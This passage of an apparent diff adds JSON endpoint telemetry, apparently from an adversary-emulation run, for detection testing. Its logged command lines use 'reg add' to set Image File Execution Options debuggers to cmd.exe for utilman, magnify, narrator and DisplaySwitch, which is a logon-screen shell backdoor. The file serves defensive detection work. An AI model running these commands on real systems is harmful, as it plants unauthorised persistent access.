"{42FC7E13-CB3E-5C05-0000-0010BB315101}", + "unique_ppid": "{42FC7E13-CB3E-5C05-0000-0010C8305101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 3444, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571826200016, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010BB315101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3444, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571826200016, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010BB315101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3444, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571826360000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010BB315101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3444, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571826360000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010BB315101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3444, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571826360000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010BB315101}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 3444, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571826360000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010BB315101}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 3444, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571826360000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010BB315101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3444, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571826360000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010BB315101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3444, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571826360000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010BB315101}" + }, + { + "event_type": "registry", + "pid": 3444, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe", + "registry_value": "utilman.exe", + "timestamp": 131883571826360000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010BB315101}" + }, + { + "event_type": "registry", + "pid": 3444, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe\\Debugger", + "registry_value": "Debugger", + "timestamp": 131883571826360000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010BB315101}" + }, + { + "event_type": "process", + "pid": 3444, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571826360000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010BB315101}" + }, + { + "event_type": "process", + "pid": 7448, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571826360000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010C8305101}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 6748, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571826509984, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101A335101}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6748, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571826520000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101A335101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6748, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571826520000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101A335101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6748, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571826520000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101A335101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6748, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571826520000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101A335101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6748, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571826520000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101A335101}" + }, + { + "event_type": "process", + "pid": 6748, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571826520000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101A335101}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\magnify.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 8140, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571827110000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00107A375101}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 8140, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571826990000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00107A375101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 8140, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571826990000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00107A375101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 8140, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571826990000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00107A375101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 8140, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571826990000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00107A375101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 8140, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571827140000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00107A375101}" + }, + { + "command_line": "reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\magnify.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7956, + "ppid": 8140, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571827210000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D385101}", + "unique_ppid": "{42FC7E13-CB3E-5C05-0000-00107A375101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 7956, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571827140000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D385101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7956, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571827140000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D385101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7956, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571827140000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D385101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7956, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571827140000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D385101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7956, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571827140000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D385101}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 7956, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571827140000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D385101}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 7956, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571827140000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D385101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7956, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571827140000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D385101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7956, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571827140000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D385101}" + }, + { + "event_type": "registry", + "pid": 7956, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\magnify.exe", + "registry_value": "magnify.exe", + "timestamp": 131883571827140000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D385101}" + }, + { + "event_type": "registry", + "pid": 7956, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\magnify.exe", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\magnify.exe\\Debugger", + "registry_value": "Debugger", + "timestamp": 131883571827140000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D385101}" + }, + { + "event_type": "process", + "pid": 7956, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571827300000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D385101}" + }, + { + "event_type": "process", + "pid": 8140, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571827300000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00107A375101}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 7012, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571827380016, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010CC395101}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7012, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571827300000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010CC395101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7012, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571827300000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010CC395101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7012, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571827300000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010CC395101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7012, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571827300000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010CC395101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7012, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571827300000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010CC395101}" + }, + { + "event_type": "process", + "pid": 7012, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571827450016, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010CC395101}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\narrator.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 6112, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571828000000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00102A3E5101}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6112, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571827920000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00102A3E5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6112, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571827920000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00102A3E5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6112, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571827920000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00102A3E5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6112, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571827920000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00102A3E5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6112, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571827920000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00102A3E5101}" + }, + { + "command_line": "reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\narrator.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4532, + "ppid": 6112, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571828080000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101E3F5101}", + "unique_ppid": "{42FC7E13-CB3E-5C05-0000-00102A3E5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 4532, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571828080000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101E3F5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4532, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571828080000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101E3F5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4532, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571828080000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101E3F5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4532, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571828080000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101E3F5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4532, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571828080000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101E3F5101}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 4532, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571828080000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101E3F5101}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 4532, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571828080000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101E3F5101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4532, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571828080000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101E3F5101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4532, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571828080000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101E3F5101}" + }, + { + "event_type": "registry", + "pid": 4532, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\narrator.exe", + "registry_value": "narrator.exe", + "timestamp": 131883571828080000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101E3F5101}" + }, + { + "event_type": "registry", + "pid": 4532, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\narrator.exe", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\narrator.exe\\Debugger", + "registry_value": "Debugger", + "timestamp": 131883571828080000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101E3F5101}" + }, + { + "event_type": "process", + "pid": 4532, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571828080000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101E3F5101}" + }, + { + "event_type": "process", + "pid": 6112, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571828080000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00102A3E5101}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 5920, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571828250000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00107D405101}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5920, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571828240000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00107D405101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5920, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571828240000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00107D405101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5920, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571828240000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00107D405101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5920, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571828240000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00107D405101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5920, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571828240000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00107D405101}" + }, + { + "event_type": "process", + "pid": 5920, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571828240000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00107D405101}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 4764, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571828860000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010DE445101}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4764, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571828860000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010DE445101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4764, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571828860000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010DE445101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4764, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571828860000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010DE445101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4764, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571828860000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010DE445101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4764, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571828860000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010DE445101}" + }, + { + "command_line": "reg 